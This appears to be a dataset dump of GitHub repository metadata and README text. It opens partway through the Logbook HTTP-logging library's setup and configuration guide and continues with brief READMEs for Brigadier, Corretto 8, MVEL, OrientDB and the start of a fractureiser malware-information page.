Secure applications usually need a slightly different setup. You should generally avoid logging unauthorized requests, especially the body, because it quickly allows attackers to flood your logfile —
and, consequently, your precious disk space. Assuming that your application handles authorization inside another filter, you have two choices:
- Don't log unauthorized requests
- Log unauthorized requests without the request body
You can easily achieve the former setup by placing the `LogbookFilter` after your security filter. The latter is a little bit more sophisticated. You’ll need two `LogbookFilter` instances — one before
your security filter, and one after it:
```java
context.addFilter(""SecureLogbookFilter"", new SecureLogbookFilter(logbook))
.addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
context.addFilter(""securityFilter"", new SecurityFilter())
.addMappingForUrlPatterns(EnumSet.of(REQUEST), true, ""/*"");
context.addFilter(""LogbookFilter"", new LogbookFilter(logbook))
.addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
```
The first logbook filter will log unauthorized requests **only**. The second filter will log authorized requests, as always.
### HTTP Client
The `logbook-httpclient` module contains both an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`:
```java
CloseableHttpClient client = HttpClientBuilder.create()
.addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.addInterceptorFirst(new LogbookHttpResponseInterceptor())
.build();
```
Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses:
```java
CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
.addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.build();
// and then wrap your response consumer
client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
```
### HTTP Client 5
The `logbook-httpclient5` module contains an `ExecHandler` to use with the `HttpClient`:
```java
CloseableHttpClient client = HttpClientBuilder.create()
.addExecInterceptorFirst(""Logbook"", new LogbookHttpExecHandler(logbook))
.build();
```
The handler should be added first, so that compression is performed after logging and decompression is performed before logging.
To avoid a breaking change, there is also an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`, which works fine as long as compression (or other ExecHandlers) is
not used:
```java
CloseableHttpClient client = HttpClientBuilder.create()
.addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.addResponseInterceptorFirst(new LogbookHttpResponseInterceptor())
.build();
```
Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses:
```java
CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
.addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
.build();
// and then wrap your response consumer
client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
```
### JAX-RS 2.x and 3.x (aka Jakarta RESTful Web Services)
> [!NOTE]
> **Support for JAX-RS 2.x**
>
> JAX-RS 2.x (legacy) support was dropped in Logbook 3.0 to 3.6.
>
> As of Logbook 3.7, JAX-RS 2.x support is back.
>
> However, you need to add the `javax` **classifier** to use the proper Logbook module:
>
> ```xml
> <dependency>
>     <groupId>org.zalando</groupId>
>     <artifactId>logbook-jaxrs</artifactId>
>     <version>${logbook.version}</version>
>     <classifier>javax</classifier>
> </dependency>
> ```
>
> You should also make sure that the following dependencies are on your classpath.
> By default, `logbook-jaxrs` imports `jersey-client 3.x`, which is not compatible with JAX-RS 2.x:
>
> * [jersey-client 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.core/jersey-client/2.41)
> * [jersey-hk2 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.inject/jersey-hk2/2.41)
> * [javax.activation](https://mvnrepository.com/artifact/javax.activation/activation/1.1.1)
The `logbook-jaxrs` module contains:
A `LogbookClientFilter` to be used for applications making HTTP requests
```java
client.register(new LogbookClientFilter(logbook));
```
A `LogbookServerFilter` to be used with HTTP servers
```java
resourceConfig.register(new LogbookServerFilter(logbook));
```
### JDK HTTP Server
The `logbook-jdkserver` module provides support for
[JDK HTTP server](https://docs.oracle.com/javase/8/docs/jre/api/net/httpserver/spec/com/sun/net/httpserver/HttpServer.html)
and contains:
A `LogbookFilter` to be used with the builtin server
```java
httpServer.createContext(path,handler).getFilters().add(new LogbookFilter(logbook))
```
### Netty
The `logbook-netty` module contains:
A `LogbookClientHandler` to be used with an `HttpClient`:
```java
HttpClient httpClient =
HttpClient.create()
.doOnConnected(
(connection -> connection.addHandlerLast(new LogbookClientHandler(logbook)))
);
```
A `LogbookServerHandler` to be used with an `HttpServer`:
```java
HttpServer httpServer =
HttpServer.create()
.doOnConnection(
connection -> connection.addHandlerLast(new LogbookServerHandler(logbook))
);
```
#### Spring WebFlux
Users of Spring WebFlux can pick any of the following options:
- Programmatically create a `NettyWebServer` (passing an `HttpServer`)
- Register a custom `NettyServerCustomizer` (see the sketch after this list)
- Programmatically create a `ReactorClientHttpConnector` (passing an `HttpClient`)
- Register a custom `WebClientCustomizer`
- Use separate connector-independent module `logbook-spring-webflux`
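For the second option, a rough sketch of such a customizer registered as a Spring bean, reusing the `LogbookServerHandler` shown above (the bean wiring is an assumption, not an official recipe):
```java
@Bean
public NettyServerCustomizer logbookNettyServerCustomizer(final Logbook logbook) {
    // attach Logbook's server handler to every connection accepted by the Netty server
    return httpServer -> httpServer.doOnConnection(
            connection -> connection.addHandlerLast(new LogbookServerHandler(logbook)));
}
```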
#### Micronaut
Users of Micronaut can follow the [official docs](https://docs.micronaut.io/snapshot/guide/index.html#nettyClientPipeline) on how to integrate Logbook with Micronaut.
:warning: Even though Quarkus and Vert.x use Netty under the hood, unfortunately neither of them allows accessing or customizing it (yet).
### OkHttp v2.x
The `logbook-okhttp2` module contains an `Interceptor` to use with version 2.x of the `OkHttpClient`:
```java
OkHttpClient client = new OkHttpClient();
client.networkInterceptors().add(new LogbookInterceptor(logbook));
```
If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition.
The transparent gzip support built into OkHttp will run after any network interceptor which forces
logbook to log compressed binary responses.
```java
OkHttpClient client = new OkHttpClient();
client.networkInterceptors().add(new LogbookInterceptor(logbook));
client.networkInterceptors().add(new GzipInterceptor());
```
### OkHttp v3.x
The `logbook-okhttp` module contains an `Interceptor` to use with version 3.x of the `OkHttpClient`:
```java
OkHttpClient client = new OkHttpClient.Builder()
.addNetworkInterceptor(new LogbookInterceptor(logbook))
.build();
```
If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition.
The transparent gzip support built into OkHttp will run after any network interceptor which forces
logbook to log compressed binary responses.
```java
OkHttpClient client = new OkHttpClient.Builder()
.addNetworkInterceptor(new LogbookInterceptor(logbook))
.addNetworkInterceptor(new GzipInterceptor())
.build();
```
### Ktor
The `logbook-ktor-client` module contains:
A `LogbookClient` to be used with an `HttpClient`:
```kotlin
private val client = HttpClient(CIO) {
install(LogbookClient) {
logbook = logbook
}
}
```
The `logbook-ktor-server` module contains:
A `LogbookServer` to be used with an `Application`:
```kotlin
private val server = embeddedServer(CIO) {
install(LogbookServer) {
logbook = logbook
}
}
```
Alternatively, you can use `logbook-ktor`, which ships both `logbook-ktor-client` and `logbook-ktor-server` modules.
### Spring
The `logbook-spring` module contains a `ClientHttpRequestInterceptor` to use with `RestTemplate`:
```java
LogbookClientHttpRequestInterceptor interceptor = new LogbookClientHttpRequestInterceptor(logbook);
RestTemplate restTemplate = new RestTemplate();
restTemplate.getInterceptors().add(interceptor);
```
### Spring Boot Starter
Logbook comes with a convenient auto configuration for Spring Boot users. It sets up all of the following parts automatically with sensible defaults:
- Servlet filter
- Second Servlet filter for unauthorized requests (if Spring Security is detected)
- Header-/Parameter-/Body-Filters
- HTTP-/JSON-style formatter
- Logging writer
Instead of declaring a dependency to `logbook-core` declare one to the Spring Boot Starter:
```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-spring-boot-starter</artifactId>
    <version>${logbook.version}</version>
</dependency>
```
Every bean can be overridden and customized if needed, e.g. like this:
```java
@Bean
public BodyFilter bodyFilter() {
return merge(
defaultValue(),
replaceJsonStringProperty(singleton(""secret""), ""XXX""));
}
```
Please refer to [`LogbookAutoConfiguration`](logbook-spring-boot-autoconfigure/src/main/java/org/zalando/logbook/autoconfigure/LogbookAutoConfiguration.java)
or the following table to see a list of possible integration points:
| Type | Name | Default |
|--------------------------|-----------------------|---------------------------------------------------------------------------|
| `FilterRegistrationBean` | `secureLogbookFilter` | Based on `LogbookFilter` |
| `FilterRegistrationBean` | `logbookFilter` | Based on `LogbookFilter` |
| `Logbook` | | Based on condition, filters, formatter and writer |
| `Predicate<HttpRequest>` | `requestCondition` | No filter; is later combined with `logbook.include` and `logbook.exclude` |
| `HeaderFilter` | | Based on `logbook.obfuscate.headers` |
| `PathFilter` | | Based on `logbook.obfuscate.paths` |
| `QueryFilter` | | Based on `logbook.obfuscate.parameters` |
| `BodyFilter` | | `BodyFilters.defaultValue()`, see [filtering](#filtering) |
| `RequestFilter` | | `RequestFilters.defaultValue()`, see [filtering](#filtering) |
| `ResponseFilter` | | `ResponseFilters.defaultValue()`, see [filtering](#filtering) |
| `Strategy` | | `DefaultStrategy` |
| `AttributeExtractor` | | `NoOpAttributeExtractor` |
| `Sink` | | `DefaultSink` |
| `HttpLogFormatter` | | `JsonHttpLogFormatter` |
| `HttpLogWriter` | | `DefaultHttpLogWriter` |
Multiple filters are merged into one.
#### Autoconfigured beans from `logbook-spring`
Some classes from `logbook-spring` are included in the auto configuration.
You can autowire `LogbookClientHttpRequestInterceptor` with code like:
```java
private final RestTemplate restTemplate;
MyClient(RestTemplateBuilder builder, LogbookClientHttpRequestInterceptor interceptor){
this.restTemplate = builder
.additionalInterceptors(interceptor)
.build();
}
```
#### Configuration
The following tables show the available configuration (sorted alphabetically):
| Configuration | Description | Default |
|------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------|
| `logbook.attribute-extractors` | List of [AttributeExtractor](#attribute-extractor)s, including configurations such as `type` (currently `JwtFirstMatchingClaimExtractor` or `JwtAllMatchingClaimsExtractor`), `claim-names` and `claim-key`. | `[]` |
| `logbook.filter.enabled` | Enable the [`LogbookFilter`](#servlet) | `true` |
| `logbook.filter.form-request-mode` | Determines how [form requests](#form-requests) are handled | `body` |
| `logbook.filters.body.default-enabled` | Enables/disables default body filters that are collected by java.util.ServiceLoader | `true` |
| `logbook.format.style` | [Formatting style](#formatting) (`http`, `json`, `curl` or `splunk`) | `json` |
| `logbook.httpclient.decompress-response` | Enables/disables additional decompression process for HttpClient with gzip encoded body (to logging purposes only). This means extra decompression and possible performance impact. | `false` (disabled) |
| `logbook.minimum-status` | Minimum status to enable logging (`status-at-least` and `body-only-if-status-at-least`) | `400` |
| `logbook.obfuscate.headers` | List of header names that need obfuscation | `[Authorization]` |
| `logbook.obfuscate.json-body-fields` | List of JSON body fields to be obfuscated | `[]` |
| `logbook.obfuscate.parameters` | List of parameter names that need obfuscation | `[access_token]` |
| `logbook.obfuscate.paths` | List of paths that need obfuscation. Check [Filtering](#filtering) for syntax. | `[]` |
| `logbook.obfuscate.replacement` | A value to be used instead of an obfuscated one | `XXX` |
| `logbook.predicate.include` | Include only certain paths and methods (if defined) | `[]` |
| `logbook.predicate.exclude` | Exclude certain paths and methods (overrides `logbook.predicate.include`) | `[]` |
| `logbook.secure-filter.enabled` | Enable the [`SecureLogbookFilter`](#servlet) | `true` |
| `logbook.strategy` | [Strategy](#strategy) (`default`, `status-at-least`, `body-only-if-status-at-least`, `without-body`) | `default` |
| `logbook.write.chunk-size` | Splits log lines into smaller chunks of size up-to `chunk-size`. | `0` (disabled) |
| `logbook.write.max-body-size` | Truncates the body up to `max-body-size` and appends `...`. :warning: Logbook will still buffer the full body, if the request is eligible for logging, regardless of the `logbook.write.max-body-size` value | `-1` (disabled) |
##### Example configuration
```yaml
logbook:
  predicate:
    include:
      - path: /api/**
        methods:
          - GET
          - POST
      - path: /actuator/**
    exclude:
      - path: /actuator/health
      - path: /api/admin/**
        methods:
          - POST
  filter.enabled: true
  secure-filter.enabled: true
  format.style: http
  strategy: body-only-if-status-at-least
  minimum-status: 400
  obfuscate:
    headers:
      - Authorization
      - X-Secret
    parameters:
      - access_token
      - password
  write:
    chunk-size: 1000
  attribute-extractors:
    - type: JwtFirstMatchingClaimExtractor
      claim-names: [ ""sub"", ""subject"" ]
      claim-key: Principal
    - type: JwtAllMatchingClaimsExtractor
      claim-names: [ ""sub"", ""iat"" ]
```
### logstash-logback-encoder
For basic Logback configuration
```xml
<configuration>
  <!-- Minimal example (assumed; not from the original README): emit JSON via logstash-logback-encoder -->
  <appender name=""json"" class=""ch.qos.logback.core.ConsoleAppender"">
    <encoder class=""net.logstash.logback.encoder.LogstashEncoder""/>
  </appender>
  <root level=""TRACE"">
    <appender-ref ref=""json""/>
  </root>
</configuration>
```
configure Logbook with a `LogstashLogbackSink`
```
HttpLogFormatter formatter = new JsonHttpLogFormatter();
LogstashLogbackSink sink = new LogstashLogbackSink(formatter);
```
for outputs like
```
{
  ""@timestamp"" : ""2019-03-08T09:37:46.239+01:00"",
  ""@version"" : ""1"",
  ""message"" : ""GET http://localhost/test?limit=1"",
  ""logger_name"" : ""org.zalando.logbook.Logbook"",
  ""thread_name"" : ""main"",
  ""level"" : ""TRACE"",
  ""level_value"" : 5000,
  ""http"" : {
    // logbook request/response contents
  }
}
```
#### Customizing default Logging Level
You can customize the default logging level by initializing `LogstashLogbackSink` with a specific level. For instance:
```
LogstashLogbackSink sink = new LogstashLogbackSink(formatter, Level.INFO);
```
## Known Issues
1. The Logbook Servlet Filter interferes with downstream code using `getWriter` and/or `getParameter*()`. See [Servlet](#servlet) for more details.
2. The Logbook Servlet Filter does **NOT** support `ERROR` dispatch. You are strongly encouraged not to use it to produce error responses.
## Getting Help with Logbook
If you have questions, concerns, bug reports, etc., please file an issue in this repository's [Issue Tracker](https://github.com/zalando/logbook/issues).
## Getting Involved/Contributing
To contribute, simply make a pull request and add a brief description (1-2 sentences) of your addition or change. For
more details, check the [contribution guidelines](.github/CONTRIBUTING.md).
## Alternatives
- [Apache HttpClient Wire Logging](http://hc.apache.org/httpcomponents-client-4.5.x/logging.html)
- Client-side only
- Apache HttpClient exclusive
- Support for HTTP bodies
- [Spring Boot Access Logging](http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#howto-configure-accesslogs)
- Spring application only
- Server-side only
- Tomcat/Undertow/Jetty exclusive
- **No** support for HTTP bodies
- [Tomcat Request Dumper Filter](https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#Request_Dumper_Filter)
- Server-side only
- Tomcat exclusive
- **No** support for HTTP bodies
- [logback-access](http://logback.qos.ch/access.html)
- Server-side only
- Any servlet container
- Support for HTTP bodies
## Credits and References
![Creative Commons (Attribution-Share Alike 3.0 Unported)](https://licensebuttons.net/l/by-sa/3.0/80x15.png)
[*Grand Turk, a replica of a three-masted 6th rate frigate from Nelson's days - logbook and charts*](https://commons.wikimedia.org/wiki/File:Grand_Turk(34).jpg)
by [JoJan](https://commons.wikimedia.org/wiki/User:JoJan) is licensed under a
[Creative Commons (Attribution-Share Alike 3.0 Unported)](http://creativecommons.org/licenses/by-sa/3.0/).
"
Mojang/brigadier,master,3322,374,2014-09-15T08:48:24Z,501,74,"Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition.",,"# Brigadier [![Latest release](https://img.shields.io/github/release/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/releases/latest) [![License](https://img.shields.io/github/license/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/blob/master/LICENSE)
Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition and now freely available for use elsewhere under the MIT license.
# Installation
Brigadier is available to Maven & Gradle via `libraries.minecraft.net`. Its group is `com.mojang`, and artifact name is `brigadier`.
## Gradle
First include our repository:
```groovy
maven {
url ""https://libraries.minecraft.net""
}
```
And then use this library (change `(the latest version)` to the latest version!):
```groovy
compile 'com.mojang:brigadier:(the latest version)'
```
## Maven
First include our repository:
```xml
<repositories>
    <repository>
        <id>minecraft-libraries</id>
        <name>Minecraft Libraries</name>
        <url>https://libraries.minecraft.net</url>
    </repository>
</repositories>
```
And then use this library (change `(the latest version)` to the latest version!):
```xml
<dependency>
    <groupId>com.mojang</groupId>
    <artifactId>brigadier</artifactId>
    <version>(the latest version)</version>
</dependency>
```
# Contributing
Contributions are welcome! :D
Most contributions will require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to,
and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com.
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.
# Usage
At the heart of Brigadier, you need a `CommandDispatcher<S>`, where `<S>` is any custom object you choose to identify a ""command source"".
A command dispatcher holds a ""command tree"", which is a series of `CommandNode`s that represent the various possible syntax options that form a valid command.
## Registering a new command
Before we can start parsing and dispatching commands, we need to build up our command tree. Every registration is an append operation,
so you can freely extend existing commands in a project without needing access to the source code that created them.
Command registration also encourages the use of a builder pattern to keep code cruft to a minimum.
A ""command"" is a fairly loose term, but typically it means an exit point of the command tree.
Every node can have an `executes` function attached to it, which signifies that if the input stops here then this function will be called with the context so far.
Consider the following example:
```java
CommandDispatcher dispatcher = new CommandDispatcher<>();
dispatcher.register(
    literal(""foo"")
        .then(
            argument(""bar"", integer())
                .executes(c -> {
                    System.out.println(""Bar is "" + getInteger(c, ""bar""));
                    return 1;
                })
        )
        .executes(c -> {
            System.out.println(""Called foo with no arguments"");
            return 1;
        })
);
```
This snippet registers two ""commands"": `foo` and `foo <bar>`. It is also common to refer to the `<bar>` as a ""subcommand"" of `foo`, as it's a child node.
At the start of the tree is a ""root node"", and it **must** have `LiteralCommandNode`s as children. Here, we register one command under the root: `literal(""foo"")`, which means ""the user must type the literal string 'foo'"".
Under that are two extra definitions: a child node for possible further evaluation, or an `executes` block if the user input stops here.
The child node works exactly the same way, but is no longer limited to literals. The other type of node that is now allowed is an `ArgumentCommandNode`, which takes in a name and an argument type.
Arguments can be anything, and you are encouraged to build your own for seamless integration into your own product. There are some standard arguments included in brigadier, such as `IntegerArgumentType`.
Argument types will be asked to parse input as much as they can, and then store the ""result"" of that argument however they see fit or throw a relevant error if they can't parse.
For example, an integer argument would parse ""123"" and store it as `123` (`int`), but throw an error if the input were `onetwothree`.
When a command is actually run, it can access these arguments in the context provided to the registered function.
## Parsing user input
So, we've registered some commands and now we're ready to take in user input. If you're in a rush, you can just call `dispatcher.execute(""foo 123"", source)` and call it a day.
The result of `execute` is an integer that was returned from an evaluated command. The meaning of this integer depends on the command, and will typically not be useful to programmers.
The `source` is an object of type `<S>`, your own custom class to track users/players/etc. It will be provided to the command so that it has some context on what's happening.
If the command failed or could not parse, some form of `CommandSyntaxException` will be thrown. It is also possible for a `RuntimeException` to be bubbled up, if not properly handled in a command.
If you wish to have more control over the parsing & executing of commands, or wish to cache the parse results so you can execute it multiple times, you can split it up into two steps:
```java
final ParseResults parse = dispatcher.parse(""foo 123"", source);
final int result = dispatcher.execute(parse);
```
This is highly recommended as the parse step is the most expensive, and may be easily cached depending on your application.
You can also use this to do further introspection on a command, before (or without) actually running it.
## Inspecting a command
If you `parse` some input, you can find out what it will perform (if anything) and provide hints to the user safely and immediately.
The parse will never fail, and the `ParseResults` it returns will contain a *possible* context that a command may be called with
(and from that, you can inspect which nodes the user entered, complete with start/end positions in the input string).
It also contains a map of parse exceptions for each command node it encountered. If it couldn't build a valid context, then
the reason why is inside this exception map.
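For illustration only (not from the original documentation), a sketch of such an inspection, where `MySource` stands in for your own `<S>` type:
```java
ParseResults<MySource> parse = dispatcher.parse(""foo 123"", source);

// The *possible* context built so far: which nodes matched, argument ranges, etc.
System.out.println(parse.getContext());

// If no valid context could be built, the per-node reasons are in the exception map.
parse.getExceptions().forEach((node, ex) ->
    System.out.println(node.getName() + "": "" + ex.getMessage()));
```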
## Displaying usage info
There are two forms of ""usage strings"" provided by this library; both require a target node.
`getAllUsage(node, source, restricted)` will return a list of all possible commands (executable end-points) under the target node and their human readable path. If `restricted`, it will ignore commands that `source` does not have access to. This will look like [`foo`, `foo <bar>`].
`getSmartUsage(node, source)` will return a map of the child nodes to their ""smart usage"" human readable path. This tries to squash future-nodes together and show optional & typed information, and can look like `foo (<bar>)`.
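A short sketch of requesting both forms (again assuming the `dispatcher` and `source` from the earlier examples; output shown in comments is indicative only):
```java
String[] all = dispatcher.getAllUsage(dispatcher.getRoot(), source, false);
for (String usage : all) {
    System.out.println(usage); // e.g. ""foo"" and ""foo <bar>""
}

var smart = dispatcher.getSmartUsage(dispatcher.getRoot(), source); // Map<CommandNode<MySource>, String>
smart.values().forEach(System.out::println); // e.g. ""foo (<bar>)""
```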
[![GitHub forks](https://img.shields.io/github/forks/Mojang/brigadier.svg?style=social&label=Fork)](https://github.com/Mojang/brigadier/fork) [![GitHub stars](https://img.shields.io/github/stars/Mojang/brigadier.svg?style=social&label=Stars)](https://github.com/Mojang/brigadier/stargazers)
"
spring-cloud/spring-cloud-netflix,main,4845,2417,2014-07-11T15:46:12Z,20239,104,Integration with Netflix OSS components,cloud-native feign java microservices netflix-eureka netflix-hystrix netflix-zuul netflixoss ribbon spring spring-boot spring-cloud spring-cloud-core,
warmuuh/milkman,master,1057,68,2019-03-27T13:42:47Z,5999,17,An Extensible Request/Response Workbench,grpc hacktoberfest http milkman-plugins rest testing,
corretto/corretto-8,develop,2090,217,2018-11-07T19:49:10Z,221170,55,"Amazon Corretto 8 is a no-cost, multi-platform, production-ready distribution of OpenJDK 8",,"## Corretto 8
Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). Corretto is used internally at Amazon for production services. With Corretto, you can develop and run Java applications on operating systems such as Amazon Linux 2, Windows, and macOS.
The latest binary Corretto 8 release builds can be downloaded from [https://github.com/corretto/corretto-8/releases](https://github.com/corretto/corretto-8/releases).
Documentation is available at [https://docs.aws.amazon.com/corretto](https://docs.aws.amazon.com/corretto).
### Licenses and Trademarks
Please read these files: ""LICENSE"", ""THIRD_PARTY_README"", ""ASSEMBLY_EXCEPTION"", ""TRADEMARKS.md"".
### Branches
_develop_
: The default branch. It absorbs active development contributions from forks or topic branches via pull requests that pass smoke testing and are accepted.
_master_
: The stable branch. Starting point for the release process. It absorbs contributions from the develop branch that pass more thorough testing and are selected for releasing.
_ga-release_
: The source code of the GA release on 01/31/2019.
_preview-release_
: The source code of the preview release on 11/14/2018.
_release-8.XXX.YY.Z_
: The source code for each release is recorded by a branch or a tag with a name of this form. XXX stands for the OpenJDK 8 update number, YY for the OpenJDK 8 build number, and Z for the Corretto-specific revision number. The latter starts at 1 and is incremented in subsequent releases as long as the update and build number remain constant.
### OpenJDK Readme
```
Welcome to the JDK!
===================
For build instructions please see https://openjdk.java.net/groups/build/doc/building.html,
or either of these files:
- doc/building.html (html version)
- doc/building.md (markdown version)
See https://openjdk.java.net for more information about the OpenJDK Community and the JDK.
```
"
mvel/mvel,master,1043,303,2011-05-17T17:59:38Z,14610,131,MVEL (MVFLEX Expression Language),,"# MVEL
MVFLEX Expression Language (MVEL) is a hybrid dynamic/statically typed, embeddable Expression Language and runtime for the Java Platform.
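As a quick illustration of embedding MVEL (a minimal sketch, not part of this README), an expression can be evaluated against a map of variables via the `org.mvel2.MVEL` facade:
```java
import org.mvel2.MVEL;

import java.util.HashMap;
import java.util.Map;

public class MvelExample {
    public static void main(String[] args) {
        Map<String, Object> vars = new HashMap<>();
        vars.put(""name"", ""world"");

        // Evaluates the expression with the supplied variables in scope.
        Object result = MVEL.eval(""'Hello ' + name"", vars);
        System.out.println(result); // Hello world
    }
}
```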
## Document
http://mvel.documentnode.com/
## How to build
```
git clone https://github.com/mvel/mvel.git
cd mvel
mvn clean install
```
"
orientechnologies/orientdb,develop,4690,866,2012-12-09T20:33:47Z,265001,292,"OrientDB is the most versatile DBMS supporting Graph, Document, Reactive, Full-Text and Geospatial models in one Multi-Model product. OrientDB can run distributed (Multi-Master), supports SQL, ACID Transactions, Full-Text indexing and Reactive Queries.",database dbms document-database fast graph-database graph-store multi-master multi-model-dbms nosql orientdb performance sql,"## OrientDB
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![REUSE status](https://api.reuse.software/badge/github.com/orientechnologies/orientdb)](https://api.reuse.software/info/github.com/orientechnologies/orientdb)
------
## What is OrientDB?
**OrientDB** is an Open Source Multi-Model [NoSQL](http://en.wikipedia.org/wiki/NoSQL) DBMS with the support of Native Graphs, Documents,
Full-Text search, Reactivity, Geo-Spatial and Object Oriented concepts. It's written in Java and it's amazingly fast.
No expensive run-time JOINs: connections are managed as persistent pointers between records.
You can traverse thousands of records in no time. It supports schema-less, schema-full and schema-mixed modes.
It has a strong security profiling system based on users, roles and predicate security, and supports [SQL](https://orientdb.org/docs/3.1.x/sql/) amongst its query languages.
Thanks to the [SQL](https://orientdb.org/docs/3.1.x/sql/) layer it's straightforward to use for people skilled in the Relational world.
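As a rough sketch (not part of this README) of what that looks like from Java, using the OrientDB 3.x API with a hypothetical ``demo`` database and `Person` class:
```java
import com.orientechnologies.orient.core.db.ODatabaseSession;
import com.orientechnologies.orient.core.db.OrientDB;
import com.orientechnologies.orient.core.db.OrientDBConfig;
import com.orientechnologies.orient.core.sql.executor.OResultSet;

public class OrientSqlExample {
    public static void main(String[] args) {
        try (OrientDB orient = new OrientDB(""embedded:./databases"", OrientDBConfig.defaultConfig());
             ODatabaseSession db = orient.open(""demo"", ""admin"", ""admin"");
             OResultSet rs = db.query(""SELECT FROM Person WHERE name = ?"", ""Luca"")) {
            // Plain SQL, familiar from the relational world, over a graph/document store.
            rs.forEachRemaining(System.out::println);
        }
    }
}
```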
[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/) |
[OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) |
[Dev Updates](https://fosstodon.org/@orientdb) |
[Community Chat](https://matrix.to/#/#orientdb-community:matrix.org)
## Is OrientDB a Relational DBMS?
No. OrientDB adheres to the [NoSQL](http://en.wikipedia.org/wiki/NoSQL) movement even though it supports [ACID Transactions](https://orientdb.org/docs/3.2.x/internals/Transactions.html) and
[SQL](https://orientdb.org/docs/3.2.x/sql/) as query language. In this way it's easy to start using it without having to learn too much new stuff.
## Easy to install and use
Yes. OrientDB is totally written in [Java](http://en.wikipedia.org/wiki/Java_%28programming_language%29) and can run on any platform without configuration and installation.
Do you develop with a language different than Java? No problem, look at the [Programming Language Binding](http://orientdb.org/docs/3.1.x/apis-and-drivers/).
## Main References
- [Documentation Version < 3.2.x](http://orientdb.org/docs/3.1.x/)
- For any questions visit the [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions)
[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/).
--------
## Contributing
For the guide to contributing to OrientDB checkout the [CONTRIBUTING.MD](https://github.com/orientechnologies/orientdb/blob/develop/CONTRIBUTING.md)
All contributions are considered licensed under the Apache 2 license unless stated otherwise.
--------
## Licensing
OrientDB is licensed by OrientDB LTD under the Apache 2 license. OrientDB relies on the following 3rd party libraries, which are compatible with the Apache license:
- Javamail: CDDL license (http://www.oracle.com/technetwork/java/faq-135477.html)
- java persistence 2.0: CDDL license
- JNA: Apache 2 (https://github.com/twall/jna/blob/master/LICENSE)
- Hibernate JPA 2.0 API: Eclipse Distribution License 1.0
- ASM: OW2
References:
- Apache 2 license (Apache2):
http://www.apache.org/licenses/LICENSE-2.0.html
- Common Development and Distribution License (CDDL-1.0):
http://opensource.org/licenses/CDDL-1.0
- Eclipse Distribution License (EDL-1.0):
http://www.eclipse.org/org/documents/edl-v10.php
### Sponsors
[![](http://s1.softpedia-static.com/_img/sp100free.png?1)](http://www.softpedia.com/get/Internet/Servers/Database-Utils/OrientDB.shtml#status)
--------
### Reference
Recent architecture re-factoring and improvements are described in our [BICOD 2021](http://ceur-ws.org/Vol-3163/BICOD21_paper_3.pdf) paper:
```
@inproceedings{DBLP:conf/bncod/0001DLT21,
author = {Daniel Ritter and
Luigi Dell'Aquila and
Andrii Lomakin and
Emanuele Tagliaferri},
title = {OrientDB: {A} NoSQL, Open Source {MMDMS}},
booktitle = {Proceedings of the The British International Conference on Databases
2021, London, United Kingdom, March 28, 2022},
series = {{CEUR} Workshop Proceedings},
volume = {3163},
pages = {10--19},
publisher = {CEUR-WS.org},
year = {2021}
}
```
"
zhoutaoo/SpringCloud,master,8529,3855,2017-07-23T14:28:08Z,10069,56,基于SpringCloud2.1的微服务开发脚手架,整合了spring-security-oauth2、nacos、feign、sentinel、springcloud-gateway等。服务治理方面引入elasticsearch、skywalking、springboot-admin、zipkin等,让项目开发快速进入业务开发,而不需过多时间花费在架构搭建上。持续更新中,elasticsearch eureka feign-client hystrix jetcache moss nacos oauth2 sentinel skywalking spring-cloud-gateway spring-security springboot springboot-admin springboot-springcloud springcloud zipkin zipkin-sleuth,
fractureiser-investigation/fractureiser,main,1118,74,2023-06-07T15:59:56Z,14837,12,Information about the fractureiser malware,,"
**Translations to other languages:**
*These were made at varying times in this document's history and **may be outdated** — especially the current status in README.md.*
* [简体中文版本见此](./lang/zh-CN/)
* [Polska wersja](./lang/pl-PL/)
* [Читать на русском языке](./lang/ru-RU/)
* [한국어는 이곳으로](./lang/ko-KR/)
* Many others that are unfinished can be found in [Pull Requests](https://github.com/fractureiser-investigation/fractureiser/pulls)
## What?
`fractureiser` is a [virus](https://en.wikipedia.org/wiki/Computer_virus) found in several Minecraft projects uploaded to CurseForge and BukkitDev. The malware is embedded in multiple mods, some of which were added to highly popular modpacks. The malware is only known to target Windows and Linux.
